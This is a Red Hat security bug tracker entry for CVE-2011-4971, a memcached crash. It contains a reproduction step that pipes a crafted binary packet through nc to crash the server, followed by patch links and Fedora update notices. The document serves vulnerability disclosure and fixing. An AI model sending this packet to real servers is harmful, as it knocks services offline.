Bug 957964 (CVE-2011-4971)

Summary: CVE-2011-4971 memcached: specially crafted packet segmentation fault
Product: [Other] Security Response Reporter: Kurt Seifried <kseifried>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED WONTFIX QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: jfrey, jlieskov, jorton, liam, lindner, matthias, mlichvar, xlecauch
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2021-06-11 21:05:04 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 957966, 957967, 957969, 957970, 988739    
Bug Blocks: 957971    

Description Kurt Seifried 2013-04-30 02:07:56 UTC 
This was originally reported by Stefan Bucur:

1. Start memcached in TCP mode. For example:

$ ./memcached -v -p 11211 -U 0

2. Send the specially crafted packet to it: 

$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211

====

There is a patch mentioned in the original issue report, but the code has 
changed significantly since then.

External References:

https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872
Comment 1 Kurt Seifried 2013-04-30 02:09:53 UTC 
Created memcached tracking bugs for this issue

Affects: fedora-all [bug 957966]
Comment 2 Kurt Seifried 2013-04-30 02:10:27 UTC 
Created memcached tracking bugs for this issue

Affects: epel-5 [bug 957967]
Comment 3 Kurt Seifried 2013-04-30 02:12:22 UTC 
Created memcached tracking bugs for this issue

Affects: epel-6 [bug 957969]
Comment 6 Huzaifa S. Sidhpurwala 2013-06-18 09:31:39 UTC 
Proposed upstream patch (with a test):

https://code.google.com/p/memcached/issues/detail?id=192#c19
Comment 11 Miroslav Lichvar 2013-12-12 13:43:40 UTC 
It seems upstream has finally accepted the patch and it's in the recently released 1.4.16. Thanks!

https://github.com/memcached/memcached/commit/6695ccbc525c36d693aaa3e8337b36aa0c784424
Comment 12 Fedora Update System 2014-02-03 02:42:28 UTC 
memcached-1.4.17-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 13 Fedora Update System 2014-02-03 02:49:02 UTC 
memcached-1.4.17-1.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 20 Product Security DevOps Team 2021-06-11 21:05:04 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2011-4971